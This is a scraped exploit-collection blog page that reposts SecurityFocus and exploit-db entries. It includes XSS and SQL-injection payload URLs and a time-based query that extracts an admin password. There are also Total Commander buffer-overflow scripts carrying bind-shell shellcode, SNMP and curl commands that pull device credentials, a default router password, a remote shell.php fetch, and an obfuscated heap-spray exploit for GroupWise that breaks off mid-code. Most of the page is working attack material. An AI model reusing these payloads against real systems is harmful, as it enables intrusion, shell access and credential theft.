source: https://www.securityfocus.com/bid/57499/info
DigiLIBE is prone to a remote information-disclosure vulnerability.
Successful exploits may allow the attacker to bypass authentication and gain access to potentially sensitive information. This may aid in further attacks.
DigiLIBE 3.4 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/configuration/general_configuration.html
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863293854
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/57522/info
gpEasy CMS is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
gpEasy CMS 3.5.2 and prior versions are vulnerable.
http://www.example.com//?cmd=new_section§ion=%22%3%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
source: https://www.securityfocus.com/bid/57541/info
The Chocolate WP Theme for WordPress is prone to multiple security vulnerabilities.
An attacker may leverage these issues to cause denial-of-service conditions, upload arbitrary files to the affected computer, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site/big_file&h=1&w=1
http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1
http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/shell.php
source: https://www.securityfocus.com/bid/57561/info
The PHPWeby Free directory script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHPWeby Free directory script 1.2 is vulnerable; other versions may also be affected.
fullname=Ping And Pong Is Interesting Game xD%5C&mail=sssssssssssssssssss&subject=,(select case((select mid(`pass`,1,1) from admin_area limit 1 offset 0)) when 0x32 then sleep(10) else 0 end) ,1,2,3,4)-- and 5!=('Advertising+Inquiry&message=TEST
# Exploit Title: Wireshark 1.12.7 Division by zero DOS PoC
# Date: 02/09/2015
# Exploit Author: spyk <spyk[dot]developpeur[at]gmail[dot]com> @SwanBeaujard
# Vendor Homepage: https://www.wireshark.org/
# Software Link: https://www.wireshark.org/download.html
# Version: 1.12.7
# Tested on: Windows 7
# Thanks to my professor @St0rn https://www.exploit-db.com/author/?a=8143
import os
import subprocess
import getpass
drive=os.getenv("systemdrive")
user=getpass.getuser()
path="%s\\Users\\%s\\AppData\\Roaming\\Wireshark\\recent" %(drive,user)
def wiresharkIsPresent():
ps=subprocess.check_output("tasklist")
if "Wireshark.exe" in ps:
return 1
else:
return 0
def killWireshark():
try:
res=subprocess.check_output("taskkill /F /IM Wireshark.exe /T")
return 1
except:
return 0
if wiresharkIsPresent():
if killWireshark():
print "Wireshark is killed!"
sploit="""
# Recent settings file for Wireshark 1.12.7.
#
# This file is regenerated each time Wireshark is quit
# and when changing configuration profile.
# So be careful, if you want to make manual changes here.
# Main Toolbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.toolbar_main_show: TRUE
# Filter Toolbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.filter_toolbar_show: TRUE
# Wireless Settings Toolbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.wireless_toolbar_show: FALSE
# Show (hide) old AirPcap driver warning dialog box.
# TRUE or FALSE (case-insensitive).
gui.airpcap_driver_check_show: TRUE
# Packet list show (hide).
# TRUE or FALSE (case-insensitive).
gui.packet_list_show: TRUE
# Tree view show (hide).
# TRUE or FALSE (case-insensitive).
gui.tree_view_show: TRUE
# Byte view show (hide).
# TRUE or FALSE (case-insensitive).
gui.byte_view_show: TRUE
# Statusbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.statusbar_show: TRUE
# Packet list colorize (hide).
# TRUE or FALSE (case-insensitive).
gui.packet_list_colorize: TRUE
# Timestamp display format.
# One of: RELATIVE, ABSOLUTE, ABSOLUTE_WITH_DATE, DELTA, DELTA_DIS, EPOCH, UTC, UTC_WITH_DATE
gui.time_format: RELATIVE
# Timestamp display precision.
# One of: AUTO, SEC, DSEC, CSEC, MSEC, USEC, NSEC
gui.time_precision: AUTO
# Seconds display format.
# One of: SECONDS, HOUR_MIN_SEC
gui.seconds_format: SECONDS
# Zoom level.
# A decimal number.
gui.zoom_level: -10
# Bytes view.
# A decimal number.
gui.bytes_view: 0
# Main window upper (or leftmost) pane size.
# Decimal number.
gui.geometry_main_upper_pane: 440
# Main window middle pane size.
# Decimal number.
gui.geometry_main_lower_pane: 428
# Packet list column pixel widths.
# Each pair of strings consists of a column format and its pixel width.
column.width: %m, 59, %t, 84, %s, 154, %d, 154, %p, 56, %L, 48, %i, 1285
# Last directory navigated to in File Open dialog.
gui.fileopen_remembered_dir: """+drive+"""\\Users\\"""+user+"""\\Documents\\
"""
try:
f=open(path,"w")
f.write(sploit)
f.close()
print "Success!"
except:
print "Fail :("
# Exploit Title: Pligg CMS 2.0.2 SQL injection
# Date: 29-08-2015
# Exploit Author: jsass
# Vendor Homepage: http://pligg.com
# Software Link: https://github.com/Pligg/pligg-cms/archive/2.0.2.zip
# Version: 2.0.2
# Tested on: kali sana 2.0
################ Q8 Gray Hat Team ################
SQLInjection
File : load_data_for_search.php
$search = new Search();
if(isset($_REQUEST['start_up']) and $_REQUEST['start_up']!= '' and $_REQUEST['pagesize'] != ''){
$pagesize = $_REQUEST['pagesize'];
$start_up = $_REQUEST['start_up'];
$limit = " LIMIT $start_up, $pagesize";
}
if(isset($_REQUEST['sql']) and $_REQUEST['sql']!= ''){
$sql = $_REQUEST['sql'];
$search->sql = $sql.$limit;
}
$fetch_link_summary = true;
$linksum_sql = $sql.$limit;
Exploit : http://localhost/pligg-cms-master/load_data_for_search.php?sql={SQLi}
Type Injection : Boolean & Time Based
Use SQLmap To Inject ..
Demo : http://www.pligg.science/load_data_for_search.php?sql={SQLi}
################ Q8 Gray Hat Team ################
Great's To : sec4ever.com && alm3refh.com
# Exploit Title: Information Exposure via SNMP on Thomson CableHome Gateway
[MODEL: DWG849] Cable Modem Gateway
# Google Dork: n/a
# Date: 09/18/2015
# Exploit Author: Matt Dunlap
# Vendor Homepage:
http://www.technicolor.com/en/solutions-services/connected-home/modems-gateways
# Software Link: n/a
# Version: Thomson CableHome Gateway <<HW_REV: 1.0; VENDOR: Thomson; BOOTR:
2.1.7i; SW_REV: STC0.01.16; MODEL: *DWG849*>>
# Tested on: Ubuntu 14.04.3
# CVE : Not reported to vendor (yet)
Information Exposure via SNMP on Thomson CableHome Gateway [MODEL: DWG849]
Cable Modem Gateway
Affected Product:
Thomson CableHome Gateway <<MODEL: DWG849>> Cable Modem Gateway
NOTE: The model DWG850-4 is open to the same attack but doesn’t come with
the remote administration enabled (no web interface, no telnet)
Severity Rating:
Important
Impact:
Username and password for the user interface as well as wireless network
keys can be disclosed through SNMP.
At the time of posting this there are 61,505 results on Shodan for this
model.
By default there are 2 open ports: 161 (snmp), 8080 (web administration)
The default password of 4GIt3M has been set on every unit I’ve tested so far
Description:
The Thomson CableHome Gateway DWG849 Cable Modem Gateway product
specifications include SNMP v2 & v3 under Network Management. The
management information bases (MIBs) of various device subsystems on the
DWG849 allows local\remote network users to discover user interface
credentials and wireless network key values through simple SNMP requests
for the value of these variables. Given the security authentication in
SNMPv1 and SNMPv2c do not offer sufficient protection, this increases the
risk that the values can be disclosed through SNMP using the default
read-only community “private”.
Object Identifiers (OIDs):
Make, Model, Software Version:
1.3.6.1.2.1.1.1.0
1.3.6.1.2.1.1.3.0
Web Interface Username \ Password (DEFAULT: admin \ Uq-4GIt3M)
1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0
1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0
SSID and KEY
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32
1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32
Guest Network OIDs
Other OIDs of interest include
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.33
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.34
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.35
[POC]
snmpget -t15 -v 2c -c private [host] 1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0
1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0 1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32
1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32
This issue has not been reported to the vendor.
#!/usr/bin/python
# EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Credits: Un_N0n
# Date of Testing: 19th September 2015
# Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe
# Tested On : Windows XP Service Pack 2
# Steps to Exploit
# Step 1: Execute this python script
# Step 2: This script will create a file called time.txt
# Step 3: Copy the contents of time.txt file
# Step 4: Now open Total Commander 8.52
# Step 5: Go To file > Change Attributes.
# Step 6: In time field paste the contents of time.txt
# Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc
file = open('time.txt' , 'w');
buffer = "\x90"*190
buffer += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # Egghunter looking for R0cX R0cX
buffer += "\x90"*(265- len(buffer))
buffer += "\x47\x47\xf7\x75" #75F74747 FFE0 JMP EAX
# bad characters - \x00\x0a\x0d
# msfvenom -p windows/shell_bind_tcp -f c -b '\x00\x0a\x0d'
buffer += "R0cX" + "R0cX" + ("\xbf\x46\xeb\xb1\xe7\xda\xc5\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x53\x31\x7d\x12\x83\xc5\x04\x03\x3b\xe5\x53\x12\x3f\x11\x11"
"\xdd\xbf\xe2\x76\x57\x5a\xd3\xb6\x03\x2f\x44\x07\x47\x7d\x69"
"\xec\x05\x95\xfa\x80\x81\x9a\x4b\x2e\xf4\x95\x4c\x03\xc4\xb4"
"\xce\x5e\x19\x16\xee\x90\x6c\x57\x37\xcc\x9d\x05\xe0\x9a\x30"
"\xb9\x85\xd7\x88\x32\xd5\xf6\x88\xa7\xae\xf9\xb9\x76\xa4\xa3"
"\x19\x79\x69\xd8\x13\x61\x6e\xe5\xea\x1a\x44\x91\xec\xca\x94"
"\x5a\x42\x33\x19\xa9\x9a\x74\x9e\x52\xe9\x8c\xdc\xef\xea\x4b"
"\x9e\x2b\x7e\x4f\x38\xbf\xd8\xab\xb8\x6c\xbe\x38\xb6\xd9\xb4"
"\x66\xdb\xdc\x19\x1d\xe7\x55\x9c\xf1\x61\x2d\xbb\xd5\x2a\xf5"
"\xa2\x4c\x97\x58\xda\x8e\x78\x04\x7e\xc5\x95\x51\xf3\x84\xf1"
"\x96\x3e\x36\x02\xb1\x49\x45\x30\x1e\xe2\xc1\x78\xd7\x2c\x16"
"\x7e\xc2\x89\x88\x81\xed\xe9\x81\x45\xb9\xb9\xb9\x6c\xc2\x51"
"\x39\x90\x17\xcf\x31\x37\xc8\xf2\xbc\x87\xb8\xb2\x6e\x60\xd3"
"\x3c\x51\x90\xdc\x96\xfa\x39\x21\x19\x15\xe6\xac\xff\x7f\x06"
"\xf9\xa8\x17\xe4\xde\x60\x80\x17\x35\xd9\x26\x5f\x5f\xde\x49"
"\x60\x75\x48\xdd\xeb\x9a\x4c\xfc\xeb\xb6\xe4\x69\x7b\x4c\x65"
"\xd8\x1d\x51\xac\x8a\xbe\xc0\x2b\x4a\xc8\xf8\xe3\x1d\x9d\xcf"
"\xfd\xcb\x33\x69\x54\xe9\xc9\xef\x9f\xa9\x15\xcc\x1e\x30\xdb"
"\x68\x05\x22\x25\x70\x01\x16\xf9\x27\xdf\xc0\xbf\x91\x91\xba"
"\x69\x4d\x78\x2a\xef\xbd\xbb\x2c\xf0\xeb\x4d\xd0\x41\x42\x08"
"\xef\x6e\x02\x9c\x88\x92\xb2\x63\x43\x17\xc2\x29\xc9\x3e\x4b"
"\xf4\x98\x02\x16\x07\x77\x40\x2f\x84\x7d\x39\xd4\x94\xf4\x3c"
"\x90\x12\xe5\x4c\x89\xf6\x09\xe2\xaa\xd2")
file.write(buffer)
file.close()
#!/usr/bin/python
# EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Credits: Un_N0n
# Date of Testing: 19th September 2015
# Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe
# Tested On : Windows 10
# Steps to Exploit
# Step 1: Execute this python script
# Step 2: This script will create a file called time.txt
# Step 3: Copy the contents of time.txt file
# Step 4: Now open Total Commander 8.52
# Step 5: Go To file > Change Attributes.
# Step 6: In time field paste the contents of time.txt
# Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc
file = open('time.txt' , 'wb');
buffer = "\x90"*265 + "\xfe\x24\x76\x6d" + "\x90"*160 # 265 NOPS + Jmp eax + 160 NOPS + SHELLCODE + 10 NOPS
# msfvenom -p windows/shell_bind_tcp -f c -b '\x00\x0a\x0d'
buffer += ("\xdb\xcb\xd9\x74\x24\xf4\x5a\x31\xc9\xbe\x97\xf8\xc7\x9d\xb1"
"\x53\x31\x72\x17\x03\x72\x17\x83\x7d\x04\x25\x68\x7d\x1d\x28"
"\x93\x7d\xde\x4d\x1d\x98\xef\x4d\x79\xe9\x40\x7e\x09\xbf\x6c"
"\xf5\x5f\x2b\xe6\x7b\x48\x5c\x4f\x31\xae\x53\x50\x6a\x92\xf2"
"\xd2\x71\xc7\xd4\xeb\xb9\x1a\x15\x2b\xa7\xd7\x47\xe4\xa3\x4a"
"\x77\x81\xfe\x56\xfc\xd9\xef\xde\xe1\xaa\x0e\xce\xb4\xa1\x48"
"\xd0\x37\x65\xe1\x59\x2f\x6a\xcc\x10\xc4\x58\xba\xa2\x0c\x91"
"\x43\x08\x71\x1d\xb6\x50\xb6\x9a\x29\x27\xce\xd8\xd4\x30\x15"
"\xa2\x02\xb4\x8d\x04\xc0\x6e\x69\xb4\x05\xe8\xfa\xba\xe2\x7e"
"\xa4\xde\xf5\x53\xdf\xdb\x7e\x52\x0f\x6a\xc4\x71\x8b\x36\x9e"
"\x18\x8a\x92\x71\x24\xcc\x7c\x2d\x80\x87\x91\x3a\xb9\xca\xfd"
"\x8f\xf0\xf4\xfd\x87\x83\x87\xcf\x08\x38\x0f\x7c\xc0\xe6\xc8"
"\x83\xfb\x5f\x46\x7a\x04\xa0\x4f\xb9\x50\xf0\xe7\x68\xd9\x9b"
"\xf7\x95\x0c\x31\xff\x30\xff\x24\x02\x82\xaf\xe8\xac\x6b\xba"
"\xe6\x93\x8c\xc5\x2c\xbc\x25\x38\xcf\xd3\xe9\xb5\x29\xb9\x01"
"\x90\xe2\x55\xe0\xc7\x3a\xc2\x1b\x22\x13\x64\x53\x24\xa4\x8b"
"\x64\x62\x82\x1b\xef\x61\x16\x3a\xf0\xaf\x3e\x2b\x67\x25\xaf"
"\x1e\x19\x3a\xfa\xc8\xba\xa9\x61\x08\xb4\xd1\x3d\x5f\x91\x24"
"\x34\x35\x0f\x1e\xee\x2b\xd2\xc6\xc9\xef\x09\x3b\xd7\xee\xdc"
"\x07\xf3\xe0\x18\x87\xbf\x54\xf5\xde\x69\x02\xb3\x88\xdb\xfc"
"\x6d\x66\xb2\x68\xeb\x44\x05\xee\xf4\x80\xf3\x0e\x44\x7d\x42"
"\x31\x69\xe9\x42\x4a\x97\x89\xad\x81\x13\xb9\xe7\x8b\x32\x52"
"\xae\x5e\x07\x3f\x51\xb5\x44\x46\xd2\x3f\x35\xbd\xca\x4a\x30"
"\xf9\x4c\xa7\x48\x92\x38\xc7\xff\x93\x68")
buffer += "\x90" *10
file.write(buffer)
file.close()
source: https://www.securityfocus.com/bid/57564/info
iCart Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
iCart Pro 4.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/forum/icart.php?do=editproduct&productid=19§ion='
1. Adivisory Information
Title: ADH-Web Server IP-Cameras Improper Access Restrictions
EDB-ID: 38245
Advisory ID: OLSA-2015-0919
Advisory URL: http://www.orwelllabs.com/2015/10/adh-web-server-ip-cameras-improper.html
Date published: 2015-09-19
Date of last update: 2016-02-15
Vendors contacted: Dedicated Micros
2. Vulnerability Information
Class: Information Exposure [CWE-200]
Impact: Access Control Bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: N/A
3. Vulnerability Description
Due to improper access restriction the ADH-Web device [1] allows a remote attacker to browse and access arbitrary files from the following directorie '/hdd0/logs'. You can also get numerous information (important for a fingerprint step) via the parameter variable in variable.cgi script [2].
Background:
Dedicated Micros’ ground breaking Closed IPTV solution makes deploying an IP Video, CCTV system safe, secure and simple. Combining patent-pending innovation with zeroconf networking technology, Closed IPTV automatically allocates IP addresses to IP cameras by physical port. In this way the system is completely deterministic, creating firewalls and monitoring IP connections by individual network ports so they cannot be hacked or intercepted. This ground breaking solution provides a very simple and secure answer to IP Video, meaning that no prior knowledge of IP networking is required. Sophisticated and Dependable network security can be achieved with a single click.
4. Vulnerable Packages
- SD Advanced Closed IPTV
- SD Advanced
- EcoSense
- Digital Sprite 2
5. Technical Description
[1] Usually this directory can be protected against unauthenticated access (401 Unauthorized), though, it can access all files directly without requiring authentication.As in the statement below:
(401): http://<target_ip>/hdd0/logs
(200): http://<target_ip>/hdd0/logs/log.txt
> Most common logfiles:
arc_log.txt
bak.txt
connect.txt
log.txt
seclog.log
startup.txt
DBGLOG.TXT
access.txt
security.txt
[2] Another problem identified is an information exposure via the parameter variable in variable.cgi script. Knowing some variables can extract a reasonable amount of information:
> DNS:
http://target_ip/variable.cgi?variable=dhcp_dns&slaveip=0.0.0.0
> ftp master ftp console credentials:
http://target_ip/variable.cgi?variable=console_master_ftpuser&slaveip=0.0.0.0
http://target_ip/variable.cgi?variable=console_master_ftppass&slaveip=0.0.0.0
(although the vast majority of servers have ftp/telnet with anonymous access allowed.)
> alms
http://target_ip/variable.cgi?variable=alarm_title&slaveip=0.0.0.0
> camconfig
http://target_ip/variable.cgi?variable=camconfig[0]&slaveip=127.0.0.1
(includes, but is not limited to)
This servers also sends credentials (and other sensitive data) via GET parameters, this is poor practice as the URL is liable to be logged in any number of places between the customer and the camera. The credentials should be passed in the body of a POST request (under SSL of course, here is not the case). . (Is possible to create, edit and delete users and other configurations in this way, very dangerous CSRF vectors).
6. Vendor Information, Solutions and Workarounds
The vendor found that some things are not vulnerabilities (sensitive information via GET, for example) and others are useless (hardcoded credentials) and others are not yet so critical (access to server logs). I think that at least this information can assist during an intrusion test, as will be shown soon.
7. Credits
These vulnerabilities has been discovered by Orwelllabs.
8. Report Timeline
2015-08-31: Vendor has been notified about the vulnerabilities (without details yet).
2015-09-01: Vendor acknowledges the receipt of the email and asks for technical details.
2015-09-01: A email with technical details is sent to vendor.
2015-09-11: Still no response, another email was sent to the Vendor requesting any opinion on the reported problems.
2015-09-11: The vendor reported that the matter was passed on to the team developed and that it would contact me the following week (2015-09-14).
2015-09-14: The development team responded by passing its consideration of the points andreported in accordance with this response the impact of these vulnerabilities is low and are no longer available unauthenticated using recent software release (version 10212).
Legal Notices
+++++++++++++
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of this information.
About Orwelllabs
++++++++++++++++
Orwelllabs is a security research lab interested in embedded device & webapp hacking.
We aims to create some intelligence around this vast and confusing picture that is the Internet of things.
-----BEGIN PGP PUBLIC KEY BLOCK-----
mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt
xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH
xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf
55hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY
U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I
SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y
d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI
AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA
Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE
f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n
pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW
LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN
95rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965
AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf
ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U
gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm
tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK
6L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc
TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb
DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30
MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf
Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q
FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU
I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB
C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37
=IZYl
-----END PGP PUBLIC KEY BLOCK-----
source: https://www.securityfocus.com/bid/57579/info
Multiple Hunt CCTV devices are prone to a remote information-disclosure vulnerability.
Successful exploits will allow attackers to obtain sensitive information, such as credentials, that may aid in further attacks.
curl -v http://www.example.com/DVR.cfg | strings |grep -i USER
source: https://www.securityfocus.com/bid/57602/info
MiniUPnP is prone to multiple denial-of-service vulnerabilities.
Attackers can exploit these issues to cause denial-of-service conditions.
MiniUPnP versions prior to 1.4 are vulnerable.
M-SEARCH * HTTP/1.1
Host:239.255.255.250:1900
ST:uuid:schemas:device:MX:3< no CRLF >
source: https://www.securityfocus.com/bid/57657/info
Novell Groupwise Client is prone to multiple remote code-execution vulnerabilities.
A remote attacker can leverage this issue to execute arbitrary code within the context of the application. Successful exploits will compromise the application, and possibly, the underlying computer.
The following versions are vulnerable:
Versions prior to 8.0.3 Hot Patch 2
Versions prior to GroupWise 2012 SP1 Hot Patch 1
<!-- (c)oded by High-Tech Bridge Security Research Lab -->
<!-- Windows XP-SP3 Internet Explorer 8.0 - Dep Disabled -->
<html>
<Title>- Novell GroupWise 12.0 InvokeContact method Exploit - </Title>
<object id=ctrl classid='clsid:{54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF}'></object>
<script language='javascript'>
function GyGguPonxZoADbtgXPS() {
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl = function(maxAlloc, heapBase) {
this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
this.heapBase = (heapBase ? heapBase : 0x150000);
this.KJZFzfumaV = "AAAA";
while (4 + this.KJZFzfumaV.length*2 + 2 < this.maxAlloc) {
this.KJZFzfumaV += this.KJZFzfumaV;
}
this.mem = new Array();
this.AocZkxOTvEXwFTsIPMSanrManzYrte();
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.mNhbOXqosTNKjGhfj = function(msg) {
void(Math.atan2(0xbabe, msg));
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.YMQLSZf = function(enable) {
if (enable == true)
void(Math.atan(0xbabe));
else
void(Math.asin(0xbabe));
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ooWKILTrZUXKEMl = function(msg) {
void(Math.acos(0xbabe));
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.zoNWUcOOYegFinTDSbOSAAM = function(len) {
if (len > this.KJZFzfumaV.length)
throw "Requested zoNWUcOOYegFinTDSbOSAAM string length " + len + ", only " + this.KJZFzfumaV.length + " available";
return this.KJZFzfumaV.substr(0, len);
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.UWzqrDQwReXOllGssMYEzruQtomLp = function(num, UWzqrDQwReXOllGssMYEzruQtomLp) {
if (UWzqrDQwReXOllGssMYEzruQtomLp == 0)
throw "Round argument cannot be 0";
return parseInt((num + (UWzqrDQwReXOllGssMYEzruQtomLp-1)) / UWzqrDQwReXOllGssMYEzruQtomLp) * UWzqrDQwReXOllGssMYEzruQtomLp;
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.beTBwoiJGBBhwyZg = function(num, width)
{
var digits = "0123456789ABCDEF";
var beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1);
while (num > 0xF) {
num = num >>> 4;
beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1) + beTBwoiJGBBhwyZg;
}
var width = (width ? width : 0);
while (beTBwoiJGBBhwyZg.length < width)
beTBwoiJGBBhwyZg = "0" + beTBwoiJGBBhwyZg;
return beTBwoiJGBBhwyZg;
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.RBRfbU = function(RBRfbU) {
return unescape("%u" + this.beTBwoiJGBBhwyZg(RBRfbU & 0xFFFF, 4) + "%u" + this.beTBwoiJGBBhwyZg((RBRfbU >> 16) & 0xFFFF, 4));
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.nPdkLCpaz = function(arg, tag) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (this.mem[tag] === undefined)
this.mem[tag] = new Array();
if (typeof arg == "string" || arg instanceof String) {
this.mem[tag].push(arg.substr(0, arg.length));
}
else {
this.mem[tag].push(this.zoNWUcOOYegFinTDSbOSAAM((arg-6)/2));
}
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.SWc = function(tag) {
delete this.mem[tag];
CollectGarbage();
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.AocZkxOTvEXwFTsIPMSanrManzYrte = function() {
this.mNhbOXqosTNKjGhfj("Flushing the OLEAUT32 cache");
this.SWc("oleaut32");
for (var i = 0; i < 6; i++) {
this.nPdkLCpaz(32, "oleaut32");
this.nPdkLCpaz(64, "oleaut32");
this.nPdkLCpaz(256, "oleaut32");
this.nPdkLCpaz(32768, "oleaut32");
}
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.uYiBaSLpjlOJJdhFAb = function(arg, tag) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if (size == 32 || size == 64 || size == 256 || size == 32768)
throw "Allocation sizes " + size + " cannot be flushed out of the OLEAUT32 cache";
this.nPdkLCpaz(arg, tag);
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.K = function(tag) {
this.SWc(tag);
this.AocZkxOTvEXwFTsIPMSanrManzYrte();
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbTbmzXVnhA = function() {
this.mNhbOXqosTNKjGhfj("Running the garbage collector");
CollectGarbage();
this.AocZkxOTvEXwFTsIPMSanrManzYrte();
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ZsJjplNR = function(arg, count) {
var count = (count ? count : 1);
for (var i = 0; i < count; i++) {
this.uYiBaSLpjlOJJdhFAb(arg);
this.uYiBaSLpjlOJJdhFAb(arg, "ZsJjplNR");
}
this.uYiBaSLpjlOJJdhFAb(arg);
